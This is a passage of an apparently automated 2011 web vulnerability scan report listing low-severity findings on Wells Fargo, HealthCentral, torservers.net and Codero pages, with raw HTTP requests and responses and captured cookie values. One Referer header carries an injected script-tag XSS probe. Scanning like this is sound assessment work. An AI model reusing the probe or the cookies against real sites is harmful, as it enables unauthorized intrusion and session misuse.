Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:58:54 GMT
Date: Tue, 19 Jul 2011 01:58:54 GMT
Content-Length: 36637
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Feeling Low Self-Worth - Common Symptoms of ADD & ADHD in Women - ADHD</titl
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

9.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

10. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /com/contact_us_form

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /com/contact_us_form HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/pi_action/rcboLocator
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941

Response 1

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:40 GMT
Content-length: 11161
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...
<input type="hidden" name="refererURL" value="/pi_action/rcboLocator">
   <input type="hidden" name="contactURL" value="">
</form>
<br />

</div><!-- end contentLeft -->


   <div id="contentRight"><div class='infoBox'><h3 class='c24InfoTitle'>Reset Password</h3> <p class='c24Text'>Change your <em>CEO<sup>&reg;</sup>
</em> portal password <a href="https://wellsoffice.wellsfargo.com/ceoportal/signon/public/ContactUs.jsp">here</a>. For technical support, call toll free <strong>1-800-289-3557</strong>.</p></div></div><!-- end contentRight -->

<div class="clearAll">&nbsp;</div></div><!-- end multiCol -->
<div class="clearAll">&nbsp;</div></div><!-- end contentCol -->
<div class="clearAll">&nbsp;</div></div><!-- end main -->
<div id="footer"><p class="footer1"><a href="/about/">About Wells Fargo</a> | <a href="/careers/">Careers</a> | <a href="/privacy_security/">Privacy, Security &amp; Legal</a> | <a href="/">Home</a> | <a href="/com/sitemap">Sitemap</a></p><p class="footer2">

&copy; 1999 - 2011 Wells Fargo. All rights reserved. NMLSR ID 399801</p></div></div><!-- end shell -->
</body></html>

Request 2

GET /com/contact_us_form HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941

Response 2

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:59 GMT
Content-length: 11143
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...
<input type="hidden" name="refererURL" value="null">
   <input type="hidden" name="contactURL" value="">
</form>
<br />

</div><!-- end contentLeft -->


   <div id="contentRight"><div class='infoBox'><h3 class='c24InfoTitle'>Reset Password</h3> <p class='c24Text'>Change your <em>CEO<sup>&reg;</sup>
</em> portal password <a href="https://wellsoffice.wellsfargo.com/ceoportal/signon/public/ContactUs.jsp">here</a>. For technical support, call toll free <strong>1-800-289-3557</strong>.</p></div></div><!-- end contentRight -->

<div class="clearAll">&nbsp;</div></div><!-- end multiCol -->
<div class="clearAll">&nbsp;</div></div><!-- end contentCol -->
<div class="clearAll">&nbsp;</div></div><!-- end main -->
<div id="footer"><p class="footer1"><a href="/about/">About Wells Fargo</a> | <a href="/careers/">Careers</a> | <a href="/privacy_security/">Privacy, Security &amp; Legal</a> | <a href="/">Home</a> | <a href="/com/sitemap">Sitemap</a></p><p class="footer2">

&copy; 1999 - 2011 Wells Fargo. All rights reserved. NMLSR ID 399801</p></div></div><!-- end shell -->
</body></html>

11. Cross-domain POST
There are 5 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


11.1. https://www.torservers.net/donate.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h4>
   <form action='https://www.paypal.com/cgi-bin/webscr' id='paypalForm' method='post' target='_blank'>
   <input name='cmd' type='hidden' value='_donations' />
...[SNIP]...

11.2. https://www.torservers.net/donate.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h4>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target='_blank'>
<input type="hidden" name="cmd" value="_xclick-subscriptions"/>
...[SNIP]...

11.3. https://www.wellsfargoadvisors.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.wellsfargo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 18 Jul 2011 19:30:09 GMT
ETag: "612-4423-6f53240"
Accept-Ranges: bytes
Content-Length: 17443
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.o
...[SNIP]...
</div>


<form action="https://www.wellsfargo.com/locator/wellsfargoadvisors/search" method="post" name="searchForm" onsubmit="return validateZIP();"><input id="Addr" name="addrLine" type="hidden" value="">
...[SNIP]...

11.4. https://www.wellsfargoadvisors.com/js/branchLocator.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /js/branchLocator.js

Issue detail

The page contains a form which POSTs data to the domain www.wellsfargo.com. The form contains the following fields:

Request

GET /js/branchLocator.js HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/market-economy/economic-market-reports/stock-markets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gridTracking=A2%20-%20The%20Week; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252F%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fmarket-economy%25252Feconomic-market-reports%25252Fstock-markets.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 Jan 2011 16:37:10 GMT
ETag: "8c1-50e-badd980"
Accept-Ranges: bytes
Content-Length: 1294
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//if the FAWP cookie does not exist, then display the branch locator
if(FAWPcookie == null) {

   document.write('<tr>');
   document.write('<td class="searchtype">');
   document.write('<form name="searchForm" method="post" action="https://www.wellsfargo.com/locator/wellsfargoadvisors/search" onSubmit="return validateZIP();">');
   document.write('<input id="Addr" name="addrLine" type="hidden" value=""/>
...[SNIP]...

11.5. https://www.wellsfargoadvisors.com/online-access/signon.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /online-access/signon.htm

Issue detail

The page contains a form which POSTs data to the domain onlineservices.wellsfargo.com. The form contains the following fields:

Request

GET /online-access/signon.htm HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gridTracking=%5B%5BB%5D%5D; s_cc=true; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dconversion%25253Asignon-decision.htm%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fonline-access%25252Fsignon.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 18 Jul 2011 14:45:13 GMT
ETag: "e77-34d1-bf4f040"
Accept-Ranges: bytes
Content-Length: 13521
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.o
...[SNIP]...
<div id="left">

<form action="https://onlineservices.wellsfargo.com/auth/login/do" autocomplete="Off" method="post" onsubmit="return disableSubmitsCollectUserPrefs(this);">

<div id="uname">
...[SNIP]...

12. SSL cookie without secure flag set
There are 6 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


12.1. https://online.wellsfargo.com/das/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/signon

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /das/signon HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/das/channel/enrollDisplay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS; BRAND_COOKIE=COB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:50:06 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN=source=alternate; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

12.2. https://online.wellsfargo.com/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

12.3. https://secure.codero.com/order/v/shop

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/shop

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /order/v/shop?cart=empty HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037236103:ss=1311037201593; orderformv1=9p25frmj6slceji5v0d7oe4u42

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:49 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: UBERSID=rfugnf2bmkoul17ds1inessum5; path=/; HttpOnly
Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 17822
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--Header Start-->
   <m
...[SNIP]...

12.4. https://secure.codero.com/order/v/viewcart

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/viewcart

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /order/v/viewcart HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037236103:ss=1311037201593

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 02:00:31 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Set-Cookie: orderformv1=18k58u5m0a4m00pq2k0dqf1ou3; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
Location: /order/v/shop?cart=empty
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


12.5. https://secure.codero.com/vpublic/js/orderform-ws.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /vpublic/js/orderform-ws.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vpublic/js/orderform-ws.php?cmd=GetOrderItemCount HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/images106c4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E1ca562d2af6/design/banner_certified-expertise.png?time=1308058010
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; orderformv1=9p25frmj6slceji5v0d7oe4u42; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037244928:ss=1311037201593; UBERSID=rfugnf2bmkoul17ds1inessum5

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:35 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: UBERSID=rfugnf2bmkoul17ds1inessum5; path=/; HttpOnly
Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

cartqty = {"item_count":0,"status":"success"}

12.6. https://www.wellsfargo.com/tas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

